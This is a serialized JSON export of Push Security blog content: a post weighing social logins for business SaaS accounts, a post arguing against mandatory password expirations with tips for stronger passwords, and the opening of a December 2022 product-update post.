up!",{"data":330988,"content":330989,"nodeType":250},{},[330990],{"data":330991,"content":330992,"nodeType":254},{},[330993],{"data":330994,"content":330995,"nodeType":178},{},[330996,331001],{"data":330997,"marks":330998,"value":331000,"nodeType":173},{},[330999],{"type":370},"Easy password resets",{"data":331002,"marks":331003,"value":331004,"nodeType":173},{},[]," - Ok, so one of your employees gets their (commonly shared) password phished. All those SaaS accounts could be immediately compromised and how many password resets now need to be performed? Oh, they use a password manager? Ok, what if their laptop is compromised with malware? You need to assume the password manager is compromised too. That’s still a lot of password resets. On the other hand, if you use social logins for everything you only have one password to change. If you have MFA too, it probably would have been tough for the attacker to make use of that password during the compromise window before the change, too.",{"data":331006,"content":331007,"nodeType":250},{},[331008],{"data":331009,"content":331010,"nodeType":254},{},[331011],{"data":331012,"content":331013,"nodeType":178},{},[331014,331019],{"data":331015,"marks":331016,"value":331018,"nodeType":173},{},[331017],{"type":370},"Easy offboarding -",{"data":331020,"marks":331021,"value":331022,"nodeType":173},{},[]," When an employee leaves the company, it’s not so hard to delete their core business accounts, but it’s much more painful to have a process for removing all old SaaS accounts too. If social logins are well implemented by the SaaS provider then the removal of a Google workspace account automatically means the corresponding SaaS accounts are no longer accessible either.  ",{"data":331024,"content":331025,"nodeType":250},{},[331026],{"data":331027,"content":331028,"nodeType":254},{},[331029],{"data":331030,"content":331031,"nodeType":178},{},[331032,331037,331041,331049],{"data":331033,"marks":331034,"value":331036,"nodeType":173},{},[331035],{"type":370},"Visibility",{"data":331038,"marks":331039,"value":331040,"nodeType":173},{},[]," - If employees use custom logins for all their SaaS platforms, you’ll have no idea what SaaS platforms are in use (unless you use the Push browser extension ;)). With social logins, you can see exactly which platforms your employees are using across the organization. (",{"data":331042,"content":331044,"nodeType":186},{"uri":331043},"https://support.google.com/a/answer/7281227?hl=en#zippy=",[331045],{"data":331046,"marks":331047,"value":331043,"nodeType":173},{},[331048],{"type":194},{"data":331050,"marks":331051,"value":74584,"nodeType":173},{},[],{"data":331053,"content":331054,"nodeType":250},{},[331055],{"data":331056,"content":331057,"nodeType":254},{},[331058],{"data":331059,"content":331060,"nodeType":178},{},[331061,331066,331070,331075],{"data":331062,"marks":331063,"value":331065,"nodeType":173},{},[331064],{"type":370},"Simplicity ",{"data":331067,"marks":331068,"value":331069,"nodeType":173},{},[],"- Complexity is often the enemy of security and, let’s face it, getting all your employees to use password managers with different passwords for large numbers of accounts, creating new accounts every time, handling password changes for all of them, etc., is the definition of complexity. On the other hand, social logins are just so simple. You login to Google once, then any other SaaS platform you want to access that supports them you just click “login with Google”, select your account and you’re done. That’s it - ",{"data":331071,"marks":331072,"value":331074,"nodeType":173},{},[331073],{"type":370},"simplicity benefits security",{"data":331076,"marks":331077,"value":197,"nodeType":173},{},[],{"data":331079,"content":331080,"nodeType":250},{},[331081],{"data":331082,"content":331083,"nodeType":254},{},[331084],{"data":331085,"content":331086,"nodeType":178},{},[331087,331092],{"data":331088,"marks":331089,"value":331091,"nodeType":173},{},[331090],{"type":370},"No shared passwords ",{"data":331093,"marks":331094,"value":331095,"nodeType":173},{},[],"- Let’s face it, it’s difficult to get employees to use password managers for everything and commonly people end up using the same one or two passwords for everything. Then all it takes is for any one platform to be compromised and that account is compromised for any other platforms where the password is shared. Therefore, your security is dependent on the security of the weakest platform you use of many. On the other hand, if you use social logins for everything, there is only ever one strongly protected account, which is much less likely to be compromised.",{"data":331097,"content":331098,"nodeType":178},{},[331099],{"data":331100,"marks":331101,"value":331102,"nodeType":173},{},[],"Our view is that it’s better to have one account that you put all your focus on securing as best as possible than many accounts that individually have a lower level of security. ",{"data":331104,"content":331105,"nodeType":178},{},[331106],{"data":331107,"marks":331108,"value":331109,"nodeType":173},{},[],"But why would I want everything in one account, protected with one password?If your Google account is used to access everything then all your eggs are in one basket right? If your Google account is compromised, or even Google themselves are compromised, then everything else you use is compromised too. Pretty concerning, right? This is true and it does remain a risk. ",{"data":331111,"content":331112,"nodeType":178},{},[331113],{"data":331114,"marks":331115,"value":331116,"nodeType":173},{},[],"However, if you’re a Google Workspace user then you’re trusting Google with most of your key data anyway - all your email, documents, calendar appointments etc are stored with Google and accessed using Google accounts. Also, if your Google email gets hacked that can generally be used to password reset all your other accounts anyway! Plus, using a password manager could be argued to also be putting all your eggs in one basket too.",{"data":331118,"content":331119,"nodeType":178},{},[331120],{"data":331121,"marks":331122,"value":331123,"nodeType":173},{},[],"We’ll go into some of the potential concerns of using social logins in this next section because there may be some valid use cases where you won’t want to use them.",{"data":331125,"content":331126,"nodeType":169},{},[331127],{"data":331128,"marks":331129,"value":331130,"nodeType":173},{},[],"Security Caveats",{"data":331132,"content":331133,"nodeType":178},{},[331134],{"data":331135,"marks":331136,"value":331137,"nodeType":173},{},[],"Ok, we said at Push Security that we encourage the use of social logins. But we aren’t going to wave our hands and cover up any downsides - as always, there are always some. We consider some of the following to be key drawbacks:",{"data":331139,"content":331140,"nodeType":250},{},[331141],{"data":331142,"content":331143,"nodeType":254},{},[331144],{"data":331145,"content":331146,"nodeType":178},{},[331147,331152],{"data":331148,"marks":331149,"value":331151,"nodeType":173},{},[331150],{"type":370},"Giving away sensitive data",{"data":331153,"marks":331154,"value":331155,"nodeType":173},{},[]," - This article has been entirely focused on social logins, but we said at the start that OAuth was for more than that. When a user logs in using Google, the website can ask for permissions far beyond what is needed for a simple social login. These can be sensitive, such as allowing access to emails, calendars, Google Drive documents etc and the user will be prompted separately to accept or refuse this. In most cases, you’ll probably find websites do not request additional permissions for a simple login/signup but may do if you enable more advanced integrations. However, some websites may just ask for the kitchen sink from the first login. It’s possible your employees may then start giving away sensitive access to third parties without a second thought.",{"data":331157,"content":331158,"nodeType":178},{},[331159,331163,331172,331176,331184],{"data":331160,"marks":331161,"value":331162,"nodeType":173},{},[],"There are also malicious apps created simply to exploit permissions so they can gain access to an employee’s or company’s data by requesting excessive permissions and requesting the employee to opt into them by default. This is called consent phishing and we’ve written up a ",{"data":331164,"content":331167,"nodeType":1698},{"target":331165},{"sys":331166},{"id":269414,"type":317,"linkType":318},[331168],{"data":331169,"marks":331170,"value":331171,"nodeType":173},{},[],"quick guide",{"data":331173,"marks":331174,"value":331175,"nodeType":173},{},[]," here about what the risk is, how it works, and how to handle it. ",{"data":331177,"content":331179,"nodeType":186},{"uri":331178},"https://pushsecurity.com/blog/consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa/",[331180],{"data":331181,"marks":331182,"value":37,"nodeType":173},{},[331183],{"type":194},{"data":331185,"marks":331186,"value":37,"nodeType":173},{},[],{"data":331188,"content":331189,"nodeType":178},{},[331190],{"data":331191,"marks":331192,"value":331193,"nodeType":173},{},[],"You can always see what access has been given by your employees to different platforms and review accordingly and you can even configure more sensitive permissions as restricted so your employees can’t accept them on their own. However, this risk remains, whereas it’s not as easy for an employee to inadvertently open up significant data access with a custom login for a website.   ",{"data":331195,"content":331196,"nodeType":250},{},[331197],{"data":331198,"content":331199,"nodeType":254},{},[331200],{"data":331201,"content":331202,"nodeType":178},{},[331203,331208],{"data":331204,"marks":331205,"value":331207,"nodeType":173},{},[331206],{"type":370},"Privacy and Anonymity",{"data":331209,"marks":331210,"value":331211,"nodeType":173},{},[]," - if you use social logins for everything, then every SaaS platform your employees use will have at least some access to basic personal information for your employees that use them. Google will also probably have more information about what SaaS providers you are using than they would otherwise, too. ",{"data":331213,"content":331214,"nodeType":178},{},[331215],{"data":331216,"marks":331217,"value":331218,"nodeType":173},{},[],"Maybe you just wanted to try out a new SaaS service without getting spammed by their sales team for the next 12 months? For that, you might want to go with an anonymous, disposable email address. Whatever the case, social logins will always give away basic personal details at a minimum and there might be times where this isn’t desirable. But for most companies, we’ve found those to be edge cases.",{"data":331220,"content":331221,"nodeType":178},{},[331222],{"data":331223,"marks":331224,"value":331225,"nodeType":173},{},[],"You may not necessarily want the public (or your adversaries) to know what SaaS apps employees are using. If an attacker gained access to your Google or Microsoft account that you were using for social login, they would be able to see the apps that are accessed with social login. On the other hand, if an attacker gets access to your primary core business platforms, this is likely going to be the least of your concerns.",{"data":331227,"content":331228,"nodeType":169},{},[331229],{"data":331230,"marks":331231,"value":40632,"nodeType":173},{},[],{"data":331233,"content":331234,"nodeType":178},{},[331235],{"data":331236,"marks":331237,"value":331238,"nodeType":173},{},[],"Social logins are good for business use for third-party SaaS platforms, not just for personal use. They save time and bring many security benefits in most cases too. As long as you understand the residual risks that remain and are happy managing those risks, you should consider encouraging your users to use social logins. ","Is logging in with Google or Microsoft secure? Yes, with caveats. ","2022-10-04T00:00:00.000Z",{"items":331242},[331243,331245],{"sys":331244,"name":26133},{"id":26132},{"sys":331246,"name":26137},{"id":26136},{"items":331248},[331249],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":331250},{"url":8615},{"items":331252},[331253],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":331254},{"url":274167},{"json":331256,"links":331544},{"data":331257,"content":331258,"nodeType":165},{},[331259,331278,331298,331318,331324,331331,331384,331391,331398,331405,331411,331418,331451,331457,331464,331519,331525],{"data":331260,"content":331261,"nodeType":178},{},[331262,331266,331274],{"data":331263,"marks":331264,"value":331265,"nodeType":173},{},[],"Passwords and policies surrounding them are perhaps not the sexiest topic to discuss. Even though there are many security vendors shouting \"passwords are dead!\" so that they can sell you their latest 0-touch-magic-super-secure authentication solution, the reality is that the world still runs on passwords. Especially in a world where employees can adopt SaaS themselves without help from IT, there will likely be loads of services in your organization where users are using passwords, rather than social logins or SSO. We wrote up ",{"data":331267,"content":331269,"nodeType":186},{"uri":331268},"https://pushsecurity.com/blog/should-i-let-my-employees-login-with-their-work-google-account/",[331270],{"data":331271,"marks":331272,"value":274113,"nodeType":173},{},[331273],{"type":194},{"data":331275,"marks":331276,"value":331277,"nodeType":173},{},[]," about why you should encourage employees to use social logins, but many will still use username and password to log in.",{"data":331279,"content":331280,"nodeType":178},{},[331281,331285,331294],{"data":331282,"marks":331283,"value":331284,"nodeType":173},{},[],"Recently, ",{"data":331286,"content":331288,"nodeType":186},{"uri":331287},"https://docs.microsoft.com/en-US/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide",[331289],{"data":331290,"marks":331291,"value":331293,"nodeType":173},{},[331292],{"type":194},"Microsoft blogged",{"data":331295,"marks":331296,"value":331297,"nodeType":173},{},[]," about their updated password policy guidance. We highly recommend that you read the full article, but we want to zoom into one aspect here around password expirations.",{"data":331299,"content":331300,"nodeType":178},{},[331301,331305,331314],{"data":331302,"marks":331303,"value":331304,"nodeType":173},{},[],"Password expirations are harmful to the quality of the passwords that people choose. There has been some commentary from security industry figures on this, but we think that ",{"data":331306,"content":331308,"nodeType":186},{"uri":331307},"https://twitter.com/WeldPond",[331309],{"data":331310,"marks":331311,"value":331313,"nodeType":173},{},[331312],{"type":194},"Chris Wysopal ",{"data":331315,"marks":331316,"value":331317,"nodeType":173},{},[],"really hits the nail on the head here.",{"data":331319,"content":331323,"nodeType":312},{"target":331320},{"sys":331321},{"id":331322,"type":317,"linkType":318},"3DxMMrA6aZkTACuHNV6e73",[],{"data":331325,"content":331326,"nodeType":178},{},[331327],{"data":331328,"marks":331329,"value":331330,"nodeType":173},{},[],"The hacking community has long known that password expirations and forced rotations cause predictable passwords. If you had to dump password hashes for any organizations that have a password expiration in their policy you will find the following passwords in use:",{"data":331332,"content":331333,"nodeType":250},{},[331334,331344,331354,331364,331374],{"data":331335,"content":331336,"nodeType":254},{},[331337],{"data":331338,"content":331339,"nodeType":178},{},[331340],{"data":331341,"marks":331342,"value":331343,"nodeType":173},{},[],"Password1! to Password9!",{"data":331345,"content":331346,"nodeType":254},{},[331347],{"data":331348,"content":331349,"nodeType":178},{},[331350],{"data":331351,"marks":331352,"value":331353,"nodeType":173},{},[],"Summer2022!",{"data":331355,"content":331356,"nodeType":254},{},[331357],{"data":331358,"content":331359,"nodeType":178},{},[331360],{"data":331361,"marks":331362,"value":331363,"nodeType":173},{},[],"Winter2022!",{"data":331365,"content":331366,"nodeType":254},{},[331367],{"data":331368,"content":331369,"nodeType":178},{},[331370],{"data":331371,"marks":331372,"value":331373,"nodeType":173},{},[],"January2022! to December2022!",{"data":331375,"content":331376,"nodeType":254},{},[331377],{"data":331378,"content":331379,"nodeType":178},{},[331380],{"data":331381,"marks":331382,"value":331383,"nodeType":173},{},[],"CompanyName1! To CompanyName9!",{"data":331385,"content":331386,"nodeType":178},{},[331387],{"data":331388,"marks":331389,"value":331390,"nodeType":173},{},[],"Why is this? If you make passwords a pain for people, they will do whatever it takes in order to remember their passwords. Some would call this “bad behavior,” but winning at security requires an understanding of human nature. If you make security hard, expect bad results.",{"data":331392,"content":331393,"nodeType":178},{},[331394],{"data":331395,"marks":331396,"value":331397,"nodeType":173},{},[],"Password policies have been a hotly debated topic over the years, especially because various compliance frameworks bake in some questionable practices like password expirations.",{"data":331399,"content":331400,"nodeType":235},{},[331401],{"data":331402,"marks":331403,"value":331404,"nodeType":173},{},[],"Try these tips for helping employees choose strong passwords",{"data":331406,"content":331407,"nodeType":178},{},[331408],{"data":331409,"marks":331410,"value":37,"nodeType":173},{},[],{"data":331412,"content":331413,"nodeType":178},{},[331414],{"data":331415,"marks":331416,"value":331417,"nodeType":173},{},[],"Here at Push, we believe the following about password policies:",{"data":331419,"content":331420,"nodeType":250},{},[331421,331431,331441],{"data":331422,"content":331423,"nodeType":254},{},[331424],{"data":331425,"content":331426,"nodeType":178},{},[331427],{"data":331428,"marks":331429,"value":331430,"nodeType":173},{},[],"Don't enforce arbitrary specials/numbers requirements, only length requirements.",{"data":331432,"content":331433,"nodeType":254},{},[331434],{"data":331435,"content":331436,"nodeType":178},{},[331437],{"data":331438,"marks":331439,"value":331440,"nodeType":173},{},[],"Don't allow certain common words in passwords, like \"password\" or your company name.",{"data":331442,"content":331443,"nodeType":254},{},[331444],{"data":331445,"content":331446,"nodeType":178},{},[331447],{"data":331448,"marks":331449,"value":331450,"nodeType":173},{},[],"Remove mandatory password rotations - it seems like a good idea but it's not.",{"data":331452,"content":331453,"nodeType":178},{},[331454],{"data":331455,"marks":331456,"value":37,"nodeType":173},{},[],{"data":331458,"content":331459,"nodeType":178},{},[331460],{"data":331461,"marks":331462,"value":331463,"nodeType":173},{},[],"For your employees:",{"data":331465,"content":331466,"nodeType":250},{},[331467,331477,331487,331509],{"data":331468,"content":331469,"nodeType":254},{},[331470],{"data":331471,"content":331472,"nodeType":178},{},[331473],{"data":331474,"marks":331475,"value":331476,"nodeType":173},{},[],"Make password managers a part of your culture. Roll them out and make them prominent. Generating random passwords that require no extra brainpower can be easy.",{"data":331478,"content":331479,"nodeType":254},{},[331480],{"data":331481,"content":331482,"nodeType":178},{},[331483],{"data":331484,"marks":331485,"value":331486,"nodeType":173},{},[],"Don't re-use passwords between sites. This becomes very difficult without a password manager",{"data":331488,"content":331489,"nodeType":254},{},[331490],{"data":331491,"content":331492,"nodeType":178},{},[331493,331497,331505],{"data":331494,"marks":331495,"value":331496,"nodeType":173},{},[],"If your account is in a breach, change that password immediately. ",{"data":331498,"content":331499,"nodeType":186},{"uri":301503},[331500],{"data":331501,"marks":331502,"value":331504,"nodeType":173},{},[331503],{"type":194},"HaveIBeenPwned",{"data":331506,"marks":331507,"value":331508,"nodeType":173},{},[]," is an excellent (free) service that can be used to discover breaches.",{"data":331510,"content":331511,"nodeType":254},{},[331512],{"data":331513,"content":331514,"nodeType":178},{},[331515],{"data":331516,"marks":331517,"value":331518,"nodeType":173},{},[],"Enable MFA on your accounts, it makes password breaches an inconvenience rather than an issue.",{"data":331520,"content":331524,"nodeType":312},{"target":331521},{"sys":331522},{"id":331523,"type":317,"linkType":318},"50lXnsUhN7txXEkIMNk1xv",[],{"data":331526,"content":331527,"nodeType":178},{},[331528,331532,331540],{"data":331529,"marks":331530,"value":331531,"nodeType":173},{},[],"Of course, we can help your employees log into SaaS apps and services securely by giving them just-in-time guidance and reaching out via ChatOps (Slack or Teams) to help them fix weak or shared password issues. ",{"data":331533,"content":331535,"nodeType":186},{"uri":331534},"https://pushsecurity.com/features/saas-discovery/",[331536],{"data":331537,"marks":331538,"value":18605,"nodeType":173},{},[331539],{"type":194},{"data":331541,"marks":331542,"value":331543,"nodeType":173},{},[]," about how we can help.",{"entries":331545},{"hyperlink":331546,"inline":331547,"block":331548},[],[],[331549,331557],{"sys":331550,"__typename":5345,"title":331551,"caption":331552,"layoutMode":112585,"file":331553},{"id":331322},"Wysopal Tweet Passwords","https://twitter.com/WeldPond/status/1560271804438298624",{"url":331554,"width":331555,"height":331556},"https://images.ctfassets.net/y1cdw1ablpvd/2s8QmOeB0eo68yQyoy01la/e2ea534a1627efa187fa79c388baf6bc/image1.png",1170,834,{"sys":331558,"__typename":5345,"title":331559,"caption":331560,"layoutMode":112585,"file":331561},{"id":331523},"Troy Hunt password dump","Troy Hunt, creator of HaveIBeenPwned, explains how to protect your account even if the login credentials were exposed",{"url":331562,"width":331563,"height":331564},"https://images.ctfassets.net/y1cdw1ablpvd/6iebMadQUiUaNRFv0lTiPk/abb7bfac50f867cc6ec296d04bb192f2/image2.png",1162,226,"content:blog:password-expirations-dont-work-try-these-best-practices-instead.json","blog/password-expirations-dont-work-try-these-best-practices-instead.json","blog/password-expirations-dont-work-try-these-best-practices-instead",{"_path":331569,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":331570,"ogImage":118,"summary":331572,"title":319742,"subtitle":118,"metaTitle":331583,"synopsis":319743,"hashTags":118,"publishedDate":319744,"slug":319745,"tagsCollection":331584,"relatedBlogPostsCollection":331588,"authorsCollection":332265,"content":332269,"_id":332660,"_type":5439,"_source":5440,"_file":332661,"_stem":332662,"_extension":5439},"/blog/product-release-december-2022",{"id":319324,"publishedAt":331571},"2023-08-21T17:30:59.492Z",{"json":331573},{"data":331574,"content":331575,"nodeType":165},{},[331576],{"data":331577,"content":331578,"nodeType":178},{},[331579],{"data":331580,"marks":331581,"value":331582,"nodeType":173},{},[],"We've expanded and improved ChatOps with new channel messaging for security teams and more granular controls.","Push Security new product features for December 2022 ",{"items":331585},[331586],{"sys":331587,"name":18399},{"id":18398},{"items":331589},[331590,331912],{"__typename":1528,"sys":331591,"content":331592,"title":325439,"synopsis":325440,"hashTags":118,"publishedDate":325441,"slug":325442,"tagsCollection":331904,"authorsCollection":331908},{"id":325081},{"json":331593},{"data":331594,"content":331595,"nodeType":165},{},[331596,331602,331623,331629,331646,331666,331672,331712,331728,331733,331739,331745,331762,331777,331792,331807,331822,331839,331845,331851,331867,331872,331888],{"data":331597,"content":331598,"nodeType":169},{},[331599],{"data":331600,"marks":331601,"value":319335,"nodeType":173},{},[],{"data":331603,"content":331604,"nodeType":250},{},[331605,331614],{"data":331606,"content":331607,"nodeType":254},{},[331608],{"data":331609,"content":331610,"nodeType":178},{},[331611],{"data":331612,"marks":331613,"value":325104,"nodeType":173},{},[],{"data":331615,"content":331616,"nodeType":254},{},[331617],{"data":331618,"content":331619,"nodeType":178},{},[331620],{"data":331621,"marks":331622,"value":325114,"nodeType":173},{},[],{"data":331624,"content":331625,"nodeType":235},{},[331626],{"data":331627,"marks":331628,"value":325121,"nodeType":173},{},[],{"data":331630,"content":331631,"nodeType":178},{},[331632,331635,331639,331642],{"data":331633,"marks":331634,"value":325128,"nodeType":173},{},[],{"data":331636,"marks":331637,"value":325133,"nodeType":173},{},[331638],{"type":370},{"data":331640,"marks":331641,"value":325137,"nodeType":173},{},[],{"data":331643,"marks":331644,"value":325142,"nodeType":173},{},[331645],{"type":370},{"data":331647,"content":331648,"nodeType":178},{},[331649,331652,331656,331659,331663],{"data":331650,"marks":331651,"value":325149,"nodeType":173},{},[],{"data":331653,"marks":331654,"value":325154,"nodeType":173},{},[331655],{"type":1646},{"data":331657,"marks":331658,"value":2936,"nodeType":173},{},[],{"data":331660,"marks":331661,"value":325162,"nodeType":173},{},[331662],{"type":370},{"data":331664,"marks":331665,"value":325166,"nodeType":173},{},[],{"data":331667,"content":331668,"nodeType":178},{},[331669],{"data":331670,"marks":331671,"value":325173,"nodeType":173},{},[],{"data":331673,"content":331674,"nodeType":246189},{},[331675,331694,331703],{"data":331676,"content":331677,"nodeType":254},{},[331678],{"data":331679,"content":331680,"nodeType":178},{},[331681,331684,331691],{"data":331682,"marks":331683,"value":325186,"nodeType":173},{},[],{"data":331685,"content":331686,"nodeType":186},{"uri":325189},[331687],{"data":331688,"marks":331689,"value":325195,"nodeType":173},{},[331690],{"type":194},{"data":331692,"marks":331693,"value":247472,"nodeType":173},{},[],{"data":331695,"content":331696,"nodeType":254},{},[331697],{"data":331698,"content":331699,"nodeType":178},{},[331700],{"data":331701,"marks":331702,"value":325208,"nodeType":173},{},[],{"data":331704,"content":331705,"nodeType":254},{},[331706],{"data":331707,"content":331708,"nodeType":178},{},[331709],{"data":331710,"marks":331711,"value":325218,"nodeType":173},{},[],{"data":331713,"content":331714,"nodeType":178},{},[331715,331718,331725],{"data":331716,"marks":331717,"value":325225,"nodeType":173},{},[],{"data":331719,"content":331720,"nodeType":186},{"uri":325189},[331721],{"data":331722,"marks":331723,"value":325195,"nodeType":173},{},[331724],{"type":194},{"data":331726,"marks":331727,"value":325236,"nodeType":173},{},[],{"data":331729,"content":331732,"nodeType":312},{"target":331730},{"sys":331731},{"id":325241,"type":317,"linkType":318},[],{"data":331734,"content":331735,"nodeType":178},{},[331736],{"data":331737,"marks":331738,"value":325249,"nodeType":173},{},[],{"data":331740,"content":331741,"nodeType":178},{},[331742],{"data":331743,"marks":331744,"value":325256,"nodeType":173},{},[],{"data":331746,"content":331747,"nodeType":178},{},[331748,331751,331759],{"data":331749,"marks":331750,"value":37,"nodeType":173},{},[],{"data":331752,"content":331755,"nodeType":1698},{"target":331753},{"sys":331754},{"id":325267,"type":317,"linkType":318},[331756],{"data":331757,"marks":331758,"value":325272,"nodeType":173},{},[],{"data":331760,"marks":331761,"value":37,"nodeType":173},{},[],{"data":331763,"content":331764,"nodeType":178},{},[331765,331768,331774],{"data":331766,"marks":331767,"value":37,"nodeType":173},{},[],{"data":331769,"content":331770,"nodeType":186},{"uri":325284},[331771],{"data":331772,"marks":331773,"value":325289,"nodeType":173},{},[],{"data":331775,"marks":331776,"value":37,"nodeType":173},{},[],{"data":331778,"content":331779,"nodeType":178},{},[331780,331783,331789],{"data":331781,"marks":331782,"value":37,"nodeType":173},{},[],{"data":331784,"content":331785,"nodeType":186},{"uri":325301},[331786],{"data":331787,"marks":331788,"value":325306,"nodeType":173},{},[],{"data":331790,"marks":331791,"value":37,"nodeType":173},{},[],{"data":331793,"content":331794,"nodeType":178},{},[331795,331798,331804],{"data":331796,"marks":331797,"value":37,"nodeType":173},{},[],{"data":331799,"content":331800,"nodeType":186},{"uri":325318},[331801],{"data":331802,"marks":331803,"value":325323,"nodeType":173},{},[],{"data":331805,"marks":331806,"value":37,"nodeType":173},{},[],{"data":331808,"content":331809,"nodeType":178},{},[331810,331813,331819],{"data":331811,"marks":331812,"value":37,"nodeType":173},{},[],{"data":331814,"content":331815,"nodeType":186},{"uri":325335},[331816],{"data":331817,"marks":331818,"value":325340,"nodeType":173},{},[],{"data":331820,"marks":331821,"value":37,"nodeType":173},{},[],{"data":331823,"content":331824,"nodeType":178},{},[331825,331828,331836],{"data":331826,"marks":331827,"value":37,"nodeType":173},{},[],{"data":331829,"content":331832,"nodeType":1698},{"target":331830},{"sys":331831},{"id":189034,"type":317,"linkType":318},[331833],{"data":331834,"marks":331835,"value":325358,"nodeType":173},{},[],{"data":331837,"marks":331838,"value":37,"nodeType":173},{},[],{"data":331840,"content":331841,"nodeType":235},{},[331842],{"data":331843,"marks":331844,"value":325368,"nodeType":173},{},[],{"data":331846,"content":331847,"nodeType":178},{},[331848],{"data":331849,"marks":331850,"value":325375,"nodeType":173},{},[],{"data":331852,"content":331853,"nodeType":178},{},[331854,331857,331864],{"data":331855,"marks":331856,"value":325382,"nodeType":173},{},[],{"data":331858,"content":331859,"nodeType":186},{"uri":325385},[331860],{"data":331861,"marks":331862,"value":325391,"nodeType":173},{},[331863],{"type":194},{"data":331865,"marks":331866,"value":325395,"nodeType":173},{},[],{"data":331868,"content":331871,"nodeType":312},{"target":331869},{"sys":331870},{"id":325400,"type":317,"linkType":318},[],{"data":331873,"content":331874,"nodeType":178},{},[331875,331878,331885],{"data":331876,"marks":331877,"value":325408,"nodeType":173},{},[],{"data":331879,"content":331880,"nodeType":186},{"uri":301630},[331881],{"data":331882,"marks":331883,"value":325416,"nodeType":173},{},[331884],{"type":194},{"data":331886,"marks":331887,"value":325420,"nodeType":173},{},[],{"data":331889,"content":331890,"nodeType":178},{},[331891,331894,331901],{"data":331892,"marks":331893,"value":325427,"nodeType":173},{},[],{"data":331895,"content":331896,"nodeType":186},{"uri":301319},[331897],{"data":331898,"marks":331899,"value":301322,"nodeType":173},{},[331900],{"type":194},{"data":331902,"marks":331903,"value":325438,"nodeType":173},{},[],{"items":331905},[331906],{"sys":331907,"name":18399},{"id":18398},{"items":331909},[331910],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":331911},{"url":19129},{"__typename":1528,"sys":331913,"content":331915,"title":332253,"synopsis":332254,"hashTags":118,"publishedDate":332255,"slug":332256,"tagsCollection":332257,"authorsCollection":332261},{"id":331914},"6u04NzVmpZJIfEEqfD4PV8",{"json":331916},{"data":331917,"content":331918,"nodeType":165},{},[331919,331926,331959,331965,331973,331990,331996,332012,332018,332025,332031,332038,332045,332062,332071,332078,332085,332127,332133,332139,332155,332161,332168,332175,332182,332189,332196,332203,332210,332216,332246],{"data":331920,"content":331921,"nodeType":178},{},[331922],{"data":331923,"marks":331924,"value":331925,"nodeType":173},{},[],"We've been busy at Push Security recently and we're so excited to tell you the latest on some highlights:",{"data":331927,"content":331928,"nodeType":250},{},[331929,331939,331949],{"data":331930,"content":331931,"nodeType":254},{},[331932],{"data":331933,"content":331934,"nodeType":178},{},[331935],{"data":331936,"marks":331937,"value":331938,"nodeType":173},{},[],"Discover SaaS and secure accounts",{"data":331940,"content":331941,"nodeType":254},{},[331942],{"data":331943,"content":331944,"nodeType":178},{},[331945],{"data":331946,"marks":331947,"value":331948,"nodeType":173},{},[],"Find risky third-party integrations",{"data":331950,"content":331951,"nodeType":254},{},[331952],{"data":331953,"content":331954,"nodeType":178},{},[331955],{"data":331956,"marks":331957,"value":331958,"nodeType":173},{},[],"Solve problems at scale with ChatOps",{"data":331960,"content":331961,"nodeType":169},{},[331962],{"data":331963,"marks":331964,"value":331938,"nodeType":173},{},[],{"data":331966,"content":331967,"nodeType":178},{},[331968],{"data":331969,"marks":331970,"value":331972,"nodeType":173},{},[331971],{"type":1646},"Use Push to discover SaaS apps employees are using in your company and secure the accounts being used to access them.",{"data":331974,"content":331975,"nodeType":178},{},[331976,331980,331987],{"data":331977,"marks":331978,"value":331979,"nodeType":173},{},[],"If you’re already using the Push platform and have connected Microsoft 365 or Google Workspace to Push, you’ll see we’ve already started ",{"data":331981,"content":331982,"nodeType":186},{"uri":285403},[331983],{"data":331984,"marks":331985,"value":331986,"nodeType":173},{},[],"showing SaaS your employees are using via social logins on the SaaS page",{"data":331988,"marks":331989,"value":39946,"nodeType":173},{},[],{"data":331991,"content":331995,"nodeType":312},{"target":331992},{"sys":331993},{"id":331994,"type":317,"linkType":318},"2ToxWrI4FhzYHLPSth2LFy",[],{"data":331997,"content":331998,"nodeType":178},{},[331999,332003,332008],{"data":332000,"marks":332001,"value":332002,"nodeType":173},{},[],"Now we’ve officially released our browser extension, you can also see the SaaS your employees are logging in to using classic usernames and passwords, so you can see your ",{"data":332004,"marks":332005,"value":332007,"nodeType":173},{},[332006],{"type":1646},"SaaSiest",{"data":332009,"marks":332010,"value":332011,"nodeType":173},{},[]," users:",{"data":332013,"content":332017,"nodeType":312},{"target":332014},{"sys":332015},{"id":332016,"type":317,"linkType":318},"5I1zjRqBhrlWxigHPvDFUd",[],{"data":332019,"content":332020,"nodeType":178},{},[332021],{"data":332022,"marks":332023,"value":332024,"nodeType":173},{},[],"Deploying the browser extension is easy - you can send install links to your employees via email or ChatOps and they can install and enroll in just a few seconds: ",{"data":332026,"content":332030,"nodeType":312},{"target":332027},{"sys":332028},{"id":332029,"type":317,"linkType":318},"7HmaMvzm4iy5NnSj1Fdi1R",[],{"data":332032,"content":332033,"nodeType":178},{},[332034],{"data":332035,"marks":332036,"value":332037,"nodeType":173},{},[],"If you’d prefer a no-click setup, watch this space, we’ll be releasing some options for managed browsers, GPO, and MDM users soon.",{"data":332039,"content":332040,"nodeType":178},{},[332041],{"data":332042,"marks":332043,"value":332044,"nodeType":173},{},[],"Using the browser extension will also show if users are using strong passwords and unique passwords between accounts and, of course, you can use ChatOps to have Push automatically reach out to any users with issues (like using weak passwords or sharing passwords with multiple apps) to have them self-remediate without you having to lift a finger.",{"data":332046,"content":332047,"nodeType":178},{},[332048,332051,332059],{"data":332049,"marks":332050,"value":37,"nodeType":173},{},[],{"data":332052,"content":332054,"nodeType":186},{"uri":332053},"https://pushsecurity.com/s?c=secure-user-accounts-demo1573",[332055],{"data":332056,"marks":332057,"value":332058,"nodeType":173},{},[],"Click here to check out an interactive demo.",{"data":332060,"marks":332061,"value":37,"nodeType":173},{},[],{"data":332063,"content":332067,"nodeType":169},{"target":332064},{"sys":332065},{"id":332066,"type":317,"linkType":318},"6sHhlmQuGNxCv1yK1mGioz",[332068],{"data":332069,"marks":332070,"value":331948,"nodeType":173},{},[],{"data":332072,"content":332073,"nodeType":178},{},[332074],{"data":332075,"marks":332076,"value":332077,"nodeType":173},{},[],"Now that you’ve got visibility of all the SaaS apps employees are using, what about all the integrations within each of those apps? 